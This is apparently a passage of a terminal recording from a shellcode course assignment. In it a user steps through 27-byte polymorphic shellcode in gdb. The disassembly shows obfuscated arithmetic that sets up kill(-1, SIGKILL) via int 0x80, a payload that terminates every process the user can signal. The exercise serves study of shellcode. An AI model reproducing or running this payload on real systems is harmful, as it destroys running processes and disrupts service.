\u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[15;19H\u001b[?12l\u001b[?25h"]
[30.717698, "o", "\r\n"]
[30.720967, "o", "Breakpoint 1 at 0x2008\r\n"]
[30.721435, "o", "(gdb) "]
[31.355388, "o", "r"]
[31.424878, "o", "u"]
[31.619225, "o", "n"]
[31.95685, "o", "\r\n"]
[31.960552, "o", "Starting program: /media/sf_SLAE_Course/SLAE/Assignment_6/kill/shellcode \r\n"]
[32.190566, "o", "Shellcode Length:  27"]
[32.190919, "o", "\r\n"]
[32.191461, "o", "eax            0x402008"]
[32.191705, "o", "\u001b[C"]
[32.191863, "o", "4202504"]
[32.192019, "o", "\r\n"]
[32.192211, "o", "ebx            0x401fd4"]
[32.192394, "o", "\u001b[C"]
[32.192546, "o", "4202452"]
[32.192693, "o", "\r\n"]
[32.192884, "o", "ecx            0x0"]
[32.193054, "o", "\u001b[6C"]
[32.193201, "o", "0"]
[32.193516, "o", "\r\n"]
[32.193708, "o", "edx            0xb7fb7890"]
[32.193909, "o", "\u001b[7C"]
[32.194058, "o", "-1208256368"]
[32.194213, "o", "\r\n"]
[32.194418, "o", "Dump of assembler code from 0x402008 to 0x402012:"]
[32.194577, "o", "\r\n"]
[32.194774, "o", "=> 0x00402008 <code+0>:"]
[32.194925, "o", "\u001b[C"]
[32.195068, "o", "xor    eax,eax"]
[32.195215, "o", "\u001b[1;25r\u001b[25;94H\n\u001b[1;26r\u001b[25;1H"]
[32.195374, "o", "   0x0040200a <code+2>:"]
[32.195514, "o", "\u001b[C"]
[32.195653, "o", "xor    ebx,ebx"]
[32.195797, "o", "\u001b[1;25r\u001b[25;94H\n\u001b[1;26r\u001b[25;1H"]
[32.195955, "o", "   0x0040200c <code+4>:"]
[32.196093, "o", "\u001b[C"]
[32.196236, "o", "xor    ecx,ecx"]
[32.196435, "o", "\u001b[1;25r\u001b[25;94H\n\u001b[1;26r\u001b[25;1H   0x0040200e <code+6>:"]
[32.197398, "o", "\u001b[Cmov    ax,0x480\u001b[1;25r\u001b[25;94H\n\u001b[1;26r\u001b[25;1HEnd of assembler dump.\u001b[1;25r\u001b[25;94H\n\u001b[1;26r\u001b[25;1H\u001b[1;25r\u001b[25;94H\n\u001b[1;26r\u001b[25;1HBreakpoint 1, 0x00402008 in code ()"]
[32.19773, "o", "\u001b[1;25r\u001b[25;94H\n\u001b[1;26r\u001b[25;1H"]
[32.197988, "o", "(gdb) "]
[33.092541, "o", "s"]
[33.436818, "o", "i"]
[33.973036, "o", "\u001b[1;25r\u001b[12S\u001b[14;1Heax            0x0\u001b[6C0\r\nebx            0x401fd4\u001b[C4202452\r\necx            0x0\u001b[6C0\r\nedx            0xb7fb7890\u001b[7C-1208256368\r\nDump of assembler code from 0x40200a to 0x402014:\r\n=> 0x0040200a <code+2>:\u001b[Cxor    ebx,ebx\r\n   0x0040200c <code+4>:\u001b[Cxor    ecx,ecx\r\n   0x0040200e <code+6>:\u001b[Cmov    ax,0x480\r\n   0x00402012 <code+10>:\u001b[8Cmov    dl,0x80\r\nEnd of assembler dump.\r\n0x0040200a in code ()\r\n(gdb) \u001b[1;26r\u001b[25;7H"]
[35.454976, "o", "\u001b[1;25r\u001b[12S\u001b[14;1Heax            0x0\u001b[6C0\r\nebx            0x0\u001b[6C0\r\necx            0x0\u001b[6C0\r\nedx            0xb7fb7890\u001b[7C-1208256368\r\nDump of assembler code from 0x40200c to 0x402016:\r\n=> 0x0040200c <code+4>:\u001b[Cxor    ecx,ecx\r\n   0x0040200e <code+6>:\u001b[Cmov    ax,0x480\r\n   0x00402012 <code+10>:\u001b[8Cmov    dl,0x80\r\n   0x00402014 <code+12>:\u001b[8Cdiv    dl\r\nEnd of assembler dump.\r\n0x0040200c in code ()\r\n(gdb) \u001b[1;26r\u001b[25;7H"]
[36.254496, "o", "\u001b[1;25r\u001b[12S\u001b[14;1Heax            0x0\u001b[6C0\r\nebx            0x0\u001b[6C0\r\necx            0x0\u001b[6C0\r\nedx            0xb7fb7890\u001b[7C-1208256368\r\nDump of assembler code from 0x40200e to 0x402018:\r\n=> 0x0040200e <code+6>:\u001b[Cmov    ax,0x480\r\n   0x00402012 <code+10>:\u001b[8Cmov    dl,0x80\r\n   0x00402014 <code+12>:\u001b[8Cdiv    dl\r\n   0x00402016 <code+14>:\u001b[8Cmov    ecx,eax\r\nEnd of assembler dump.\r\n0x0040200e in code ()\r\n(gdb) \u001b[1;26r\u001b[25;7H"]
[37.280646, "o", "\u001b[1;25r\u001b[12S\u001b[14;1Heax            0x480\u001b[4C1152\r\nebx            0x0\u001b[6C0\r\necx            0x0\u001b[6C0\r\nedx            0xb7fb7890\u001b[7C-1208256368\r\nDump of assembler code from 0x402012 to 0x40201c:\r\n=> 0x00402012 <code+10>:\u001b[8Cmov    dl,0x80\r\n   0x00402014 <code+12>:\u001b[8Cdiv    dl\r\n   0x00402016 <code+14>:\u001b[8Cmov    ecx,eax\r\n   0x00402018 <code+16>:\u001b[8Cmov    ax,0xfe6\r\nEnd of assembler dump.\r\n0x00402012 in code ()\r\n(gdb) \u001b[1;26r\u001b[25;7H"]
[38.352421, "o", "\u001b[1;25r\u001b[12S\u001b[14;1Heax            0x480\u001b[4C1152\r\nebx            0x0\u001b[6C0\r\necx            0x0\u001b[6C0\r\nedx            0xb7fb7880\u001b[7C-1208256384\r\nDump of assembler code from 0x402014 to 0x40201e:\r\n=> 0x00402014 <code+12>:\u001b[8Cdiv    dl\r\n   0x00402016 <code+14>:\u001b[8Cmov    ecx,eax\r\n   0x00402018 <code+16>:\u001b[8Cmov    ax,0xfe6\r\n   0x0040201c <code+20>:\u001b[8Cmov    dl,0x6e\r\nEnd of assembler dump.\r\n0x00402014 in code ()\r\n(gdb) \u001b[1;26r\u001b[25;7H"]
[39.272372, "o", "\u001b[1;25r\u001b[12S\u001b[14;1Heax            0x9\u001b[6C9\r\nebx            0x0\u001b[6C0\r\necx            0x0\u001b[6C0\r\nedx            0xb7fb7880\u001b[7C-1208256384\r\nDump of assembler code from 0x402016 to 0x402020:\r\n=> 0x00402016 <code+14>:\u001b[8Cmov    ecx,eax\r\n   0x00402018 <code+16>:\u001b[8Cmov    ax,0xfe6\r\n   0x0040201c <code+20>:\u001b[8Cmov    dl,0x6e\r\n   0x0040201e <code+22>:\u001b[8Cdiv    dl\r\nEnd of assembler dump.\r\n0x00402016 in code ()\r\n(gdb) \u001b[1;26r\u001b[25;7H"]
[40.086523, "o", "\u001b[?25l\u001b[H(gdb)\u001b[K\r\neax            0x480    1152\u001b[K\r\nebx            0x0      0\u001b[K\r\necx            0x0      0\u001b[K\r\nedx            0xb7fb7880       -1208256384\u001b[K\r\nDump of assembler code from 0x402014 to 0x40201e:\u001b[K\r\n=> 0x00402014 <code+12>:        div    dl\u001b[K\r\n   0x00402016 <code+14>:        mov    ecx,eax\u001b[K\r\n   0x00402018 <code+16>:        mov    ax,0xfe6\u001b[K\r\n   0x0040201c <code+20>:        mov    dl,0x6e\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402014 in code ()\u001b[K\r\n(gdb)\u001b[K\r\neax"]
[40.086851, "o", "            0x9      9\u001b[K\r\nebx            0x0      0\u001b[K\r\necx            0x0      0\u001b[K\r\nedx            0xb7fb7880       -1208256384\u001b[K\r\nDump of assembler code from 0x402016 to 0x402020:\u001b[K\r\n=> 0x00402016 <code+14>:        mov    ecx,eax\u001b[K\r\n   0x00402018 <code+16>:        mov    ax,0xfe6\u001b[K\r\n   0x0040201c <code+20>:        mov    dl,0x6e\u001b[K\r\n   0x0040201e <code+22>:        div    dl\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402016 in code ()\u001b[K\r\n(gdb)\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[25;7H\u001b[?12l\u001b[?25h"]
[40.16052, "o", "\u001b[?25l\u001b[H(gdb)\u001b[K\r\neax            0x480    1152\u001b[K\r\nebx            0x0      0\u001b[K\r\necx            0x0      0\u001b[K\r\nedx            0xb7fb7880       -1208256384\u001b[K\r\nDump of assembler code from 0x402014 to 0x40201e:\u001b[K\r\n=> 0x00402014 <code+12>:        div    dl\u001b[K\r\n   0x00402016 <code+14>:        mov    ecx,eax\u001b[K\r\n   0x00402018 <code+16>:        mov    ax,0xfe6\u001b[K\r\n   0x0040201c <code+20>:        mov    dl,0x6e\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402014 in code ()\u001b[K\r\n(gdb)\u001b[K\r\neax"]
[40.160926, "o", "            0x9      9\u001b[K\r\nebx            0x0      0\u001b[K\r\necx            0x0      0\u001b[K\r\nedx            0xb7fb7880       -1208256384\u001b[K\r\nDump of assembler code from 0x402016 to 0x402020:\u001b[K\r\n=> 0x00402016 <code+14>:        mov    ecx,eax\u001b[K\r\n   0x00402018 <code+16>:        mov    ax,0xfe6\u001b[K\r\n   0x0040201c <code+20>:        mov    dl,0x6e\u001b[K\r\n   0x0040201e <code+22>:        div    dl\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402016 in code ()\u001b[K\r\n(gdb)\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[25;7H\u001b[?12l\u001b[?25h"]
[40.755368, "o", "\u001b[1;25r\u001b[13S\u001b[13;1Heax            0x9\u001b[6C9\r\nebx            0x0\u001b[6C0\r\necx            0x9\u001b[6C9\r\nedx            0xb7fb7880\u001b[7C-1208256384\r\nDump of assembler code from 0x402018 to 0x402022:\r\n=> 0x00402018 <code+16>:\u001b[8Cmov    ax,0xfe6\r\n   0x0040201c <code+20>:\u001b[8Cmov    dl,0x6e\r\n   0x0040201e <code+22>:\u001b[8Cdiv    dl\r\n   0x00402020 <code+24>:\u001b[8Cdec    ebx\r\n   0x00402021 <code+25>:\u001b[8Cint    0x80\r\nEnd of assembler dump.\r\n0x00402018 in code ()\r\n(gdb) \u001b[1;26r\u001b[25;7H"]
[44.370817, "o", "E"]
[44.769654, "o", "C"]
[45.042774, "o", "X"]
[45.337863, "o", " "]
[45.71691, "o", "i"]
[45.89828, "o", "s"]
[45.995306, "o", " "]
[46.178352, "o", "n"]
[46.410609, "o", "o"]
[46.555654, "o", "w"]
[46.682446, "o", " "]
[47.28384, "o", "O"]
[47.523366, "o", "K"]
[47.667674, "o", " "]
[47.923846, "o", "w"]
[48.02743, "o", "i"]
[48.259265, "o", "t"]
[48.299295, "o", "h"]
[48.382462, "o", " "]
[49.830463, "o", "t"]
[49.868386, "o", "h"]
[50.092179, "o", "\u001b[?25l\u001b[Heax            0x9      9\u001b[K\r\nebx            0x0      0\u001b[K\r\necx            0x0      0\u001b[K\r\nedx            0xb7fb7880       -1208256384\u001b[K\r\nDump of assembler code from 0x402016 to 0x402020:\u001b[K\r\n=> 0x00402016 <code+14>:        mov    ecx,eax\u001b[K\r\n   0x00402018 <code+16>:        mov    ax,0xfe6\u001b[K\r\n   0x0040201c <code+20>:        mov    dl,0x6e\u001b[K\r\n   0x0040201e <code+22>:        div    dl\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402016 in code ()\u001b[K\r\n(gdb)\u001b[K\r\neax            0"]
[50.092477, "o", "x9      9\u001b[K\r\nebx            0x0      0\u001b[K\r\necx            0x9      9\u001b[K\r\nedx            0xb7fb7880       -1208256384\u001b[K\r\nDump of assembler code from 0x402018 to 0x402022:\u001b[K\r\n=> 0x00402018 <code+16>:        mov    ax,0xfe6\u001b[K\r\n   0x0040201c <code+20>:        mov    dl,0x6e\u001b[K\r\n   0x0040201e <code+22>:        div    dl\u001b[K\r\n   0x00402020 <code+24>:        dec    ebx\u001b[K\r\n   0x00402021 <code+25>:        int    0x80\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402018 in code ()\u001b[K\r\n(gdb) ECX is now OK with th\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[25;28H\u001b[?12l\u001b[?25h"]
[50.10104, "o", "e"]
[50.179422, "o", "\u001b[?25l\u001b[Heax            0x9      9\u001b[K\r\nebx            0x0      0\u001b[K\r\necx            0x0      0\u001b[K\r\nedx            0xb7fb7880       -1208256384\u001b[K\r\nDump of assembler code from 0x402016 to 0x402020:\u001b[K\r\n=> 0x00402016 <code+14>:        mov    ecx,eax\u001b[K\r\n   0x00402018 <code+16>:        mov    ax,0xfe6\u001b[K\r\n   0x0040201c <code+20>:        mov    dl,0x6e\u001b[K\r\n   0x0040201e <code+22>:        div    dl\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402016 in code ()\u001b[K\r\n(gdb)\u001b[K\r\neax            0"]
[50.179839, "o", "x9      9\u001b[K\r\nebx            0x0      0\u001b[K\r\necx            0x9      9\u001b[K\r\nedx            0xb7fb7880       -1208256384\u001b[K\r\nDump of assembler code from 0x402018 to 0x402022:\u001b[K\r\n=> 0x00402018 <code+16>:        mov    ax,0xfe6\u001b[K\r\n   0x0040201c <code+20>:        mov    dl,0x6e\u001b[K\r\n   0x0040201e <code+22>:        div    dl\u001b[K\r\n   0x00402020 <code+24>:        dec    ebx\u001b[K\r\n   0x00402021 <code+25>:        int    0x80\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402018 in code ()\u001b[K\r\n(gdb) ECX is now OK with the\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:40 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[25;29H\u001b[?12l\u001b[?25h"]
[50.228884, "o", " "]
[50.460474, "o", "s"]
[50.558645, "o", "i"]
[50.733072, "o", "g"]
[50.845478, "o", "n"]
[51.372919, "o", "a"]
[51.46893, "o", "l"]
[51.568153, "o", " "]
[51.894001, "o", "c"]
[51.989133, "o", "o"]
[52.117251, "o", "d"]
[52.189223, "o", "e"]
[52.941848, "o", "="]
[53.398793, "o", "0"]
[53.862339, "o", "\b\u001b[K"]
[54.086144, "o", "9"]
[54.808758, "o", "\b\u001b[K"]
[55.308081, "o", "\b\u001b[K"]
[55.339867, "o", "\b\u001b[K"]
[55.371643, "o", "\b\u001b[K"]
[55.406469, "o", "\b\u001b[K"]
[55.439842, "o", "\b\u001b[K"]
[55.47032, "o", "\b\u001b[K"]
[55.500458, "o", "\b\u001b[K"]
[55.52989, "o", "\b\u001b[K"]
[55.561736, "o", "\b\u001b[K"]
[55.592842, "o", "\b\u001b[K"]
[55.627118, "o", "\b\u001b[K"]
[55.65723, "o", "\b\u001b[K"]
[55.689259, "o", "\b\u001b[K"]
[55.72777, "o", "\b\u001b[K"]
[55.760093, "o", "\b\u001b[K"]
[55.79237, "o", "\b\u001b[K"]
[55.821242, "o", "\b\u001b[K"]
[55.851395, "o", "\b\u001b[K"]
[55.880904, "o", "\b\u001b[K"]
[55.913522, "o", "\b\u001b[K"]
[55.943914, "o", "\b\u001b[K"]
[55.974946, "o", "\b\u001b[K"]
[56.004725, "o", "\b\u001b[K"]
[56.037967, "o", "\b\u001b[K"]
[56.069552, "o", "\b\u001b[K"]
[56.102566, "o", "\b\u001b[K"]
[56.129837, "o", "\b\u001b[K"]
[56.162285, "o", "\b\u001b[K"]
[56.194815, "o", "\b\u001b[K"]
[56.22617, "o", "\b\u001b[K"]
[56.255599, "o", "\b\u001b[K"]
[56.291286, "o", "\b\u001b[K"]
[56.323855, "o", "\b\u001b[K"]
[56.355194, "o", "\b\u001b[K"]
[56.386951, "o", "\b\u001b[K"]
[56.415359, "o", "\u0007"]
[56.446232, "o", "\u0007"]
[56.480644, "o", "\u0007"]
[56.647497, "o", "\u0007"]
[56.967633, "o", "s"]
[57.137571, "o", "i"]
[57.905439, "o", "\u001b[1;25r\u001b[14S\u001b[12;1Heax            0xfe6\u001b[4C4070\r\nebx            0x0\u001b[6C0\r\necx            0x9\u001b[6C9\r\nedx            0xb7fb7880\u001b[7C-1208256384\r\nDump of assembler code from 0x40201c to 0x402026:\r\n=> 0x0040201c <code+20>:\u001b[8Cmov    dl,0x6e\r\n   0x0040201e <code+22>:\u001b[8Cdiv    dl\r\n   0x00402020 <code+24>:\u001b[8Cdec    ebx\r\n   0x00402021 <code+25>:\u001b[8Cint    0x80\r\n   0x00402023 <code+27>:\u001b[8Cadd    BYTE PTR [eax],al\r\n   0x00402025:\u001b[2Cadd    BYTE PTR [eax],al\r\nEnd of assembler dump.\r\n0x0040201c in code ()\r\n(gdb) \u001b[1;26r\u001b[25;7H"]
[58.899235, "o", "\u001b[1;25r\u001b[14S\u001b[12;1Heax            0xfe6\u001b[4C4070\r\nebx            0x0\u001b[6C0\r\necx            0x9\u001b[6C9\r\nedx            0xb7fb786e\u001b[7C-1208256402\r\nDump of assembler code from 0x40201e to 0x402028:\r\n=> 0x0040201e <code+22>:\u001b[8Cdiv    dl\r\n   0x00402020 <code+24>:\u001b[8Cdec    ebx\r\n   0x00402021 <code+25>:\u001b[8Cint    0x80\r\n   0x00402023 <code+27>:\u001b[8Cadd    BYTE PTR [eax],al\r\n   0x00402025:\u001b[2Cadd    BYTE PTR [eax],al\r\n   0x00402027:\u001b[2Cadd    BYTE PTR [eax],al\r\nEnd of assembler dump.\r\n0x0040201e in code ()\r\n(gdb) \u001b[1;26r\u001b[25;7H"]
[59.994778, "o", "\u001b[1;25r\u001b[14S\u001b[12;1Heax            0x25\u001b[5C37\r\nebx            0x0\u001b[6C0\r\necx            0x9\u001b[6C9\r\nedx            0xb7fb786e\u001b[7C-1208256402\r\nDump of assembler code from 0x402020 to 0x40202a:\r\n=> 0x00402020 <code+24>:\u001b[8Cdec    ebx\r\n   0x00402021 <code+25>:\u001b[8Cint    0x80\r\n   0x00402023 <code+27>:\u001b[8Cadd    BYTE PTR [eax],al\r\n   0x00402025:\u001b[2Cadd    BYTE PTR [eax],al\r\n   0x00402027:\u001b[2Cadd    BYTE PTR [eax],al\r\n   0x00402029:\u001b[2Cadd    BYTE PTR [eax],al\r\nEnd of assembler dump.\r\n0x00402020 in code ()\r\n(gdb) \u001b[1;26r\u001b[25;7H"]
[60.051074, "o", "\u001b[?25l\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:41 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[25;7H\u001b[?12l\u001b[?25h"]
[60.149033, "o", "\u001b[?25l\u001b[Hedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x40201e to 0x402028:\u001b[K\r\n=> 0x0040201e <code+22>:        div    dl\u001b[K\r\n   0x00402020 <code+24>:        dec    ebx\u001b[K\r\n   0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x0040201e in code ()\u001b[K\r\n(gdb)\u001b[K\r\neax           "]
[60.149487, "o", " 0x25     37\u001b[K\r\nebx            0x0      0\u001b[K\r\necx            0x9      9\u001b[K\r\nedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x402020 to 0x40202a:\u001b[K\r\n=> 0x00402020 <code+24>:        dec    ebx\u001b[K\r\n   0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402020 in code ()\u001b[K\r\n(gdb)\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:41 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[25;7H\u001b[?12l\u001b[?25h"]
[60.252247, "o", "\u001b[?25l\u001b[Hedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x40201e to 0x402028:\u001b[K\r\n=> 0x0040201e <code+22>:        div    dl\u001b[K\r\n   0x00402020 <code+24>:        dec    ebx\u001b[K\r\n   0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x0040201e in code ()\u001b[K\r\n(gdb)\u001b[K\r\neax           "]
[60.252919, "o", " 0x25     37\u001b[K\r\nebx            0x0      0\u001b[K\r\necx            0x9      9\u001b[K\r\nedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x402020 to 0x40202a:\u001b[K\r\n=> 0x00402020 <code+24>:        dec    ebx\u001b[K\r\n   0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402020 in code ()\u001b[K\r\n(gdb)\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 29m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ \u001b[38;5;196m◼\u001b[38;5;202m◼\u001b[38;5;208m◻\u001b[38;5;214m◻\u001b[38;5;220m◻\u001b[38;5;226m◻\u001b[38;5;190m◻\u001b[38;5;154m◻\u001b[38;5;118m◻\u001b[38;5;82m◻\u001b[38;5;202m 15% \u001b[38;5;245m| 18:41 | 17 ago \u001b[38;5;254m\u001b[48;5;160m thesp0n+ \u001b[38;5;16m\u001b[48;5;254m\u001b[1m SLAE \u001b(B\u001b[m\u001b[25;7H\u001b[?12l\u001b[?25h"]
[61.972017, "o", "E"]
[62.290587, "o", "A"]
[62.49071, "o", "X"]
[62.611865, "o", " "]
[62.852223, "o", "i"]
[62.963641, "o", "s"]
[63.066867, "o", " "]
[63.25088, "o", "n"]
[63.459447, "o", "o"]
[63.587368, "o", "w"]
[63.701159, "o", " "]
[64.075468, "o", "O"]
[64.284576, "o", "K"]
[64.475599, "o", " "]
[64.884782, "o", "w"]
[64.987731, "o", "i"]
[65.21268, "o", "t"]
[65.333377, "o", "h"]
[65.41456, "o", " "]
[65.715949, "o", "t"]
[65.804801, "o", "h"]
[66.100247, "o", " "]
[66.373907, "o", "\b\u001b[K"]
[66.500429, "o", "e"]
[66.956747, "o", " "]
[68.486971, "o", "S"]
[69.278083, "o", "Y"]
[69.487086, "o", "S"]
[69.727256, "o", "T"]
[69.806345, "o", "E"]
[69.942831, "o", "M"]
[70.090545, "o", "\u001b[?25l\u001b[Hedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x40201e to 0x402028:\u001b[K\r\n=> 0x0040201e <code+22>:        div    dl\u001b[K\r\n   0x00402020 <code+24>:        dec    ebx\u001b[K\r\n   0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x0040201e in code ()\u001b[K\r\n(gdb)\u001b[K\r\neax           "]
[70.09084, "o", " 0x25     37\u001b[K\r\nebx            0x0      0\u001b[K\r\necx            0x9      9\u001b[K\r\nedx            0xb7fb786e       -1208256402\u001b[K\r\nDump of assembler code from 0x402020 to 0x40202a:\u001b[K\r\n=> 0x00402020 <code+24>:        dec    ebx\u001b[K\r\n   0x00402021 <code+25>:        int    0x80\u001b[K\r\n   0x00402023 <code+27>:        add    BYTE PTR [eax],al\u001b[K\r\n   0x00402025:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402027:  add    BYTE PTR [eax],al\u001b[K\r\n   0x00402029:  add    BYTE PTR [eax],al\u001b[K\r\nEnd of assembler dump.\u001b[K\r\n0x00402020 in code ()\u001b[K\r\n(gdb) EAX is now OK with the SYSTEM\u001b[K\r\n\u001b[38;5;16m\u001b[48;5;226m\u001b[1m ❐ SLAE \u001b(B\u001b[m\u001b[38;5;254m\u001b[48;5;199m ↑ 14h 30m \u001b[38;5;199m\u001b[48;5;232m \u001b[38;5;16m\u001b[48;5;39m\u001b[1m 1 gdb \u001b(B\u001b[m\u001b[38;5;245m\u001b[48;5;232m                 ↓ 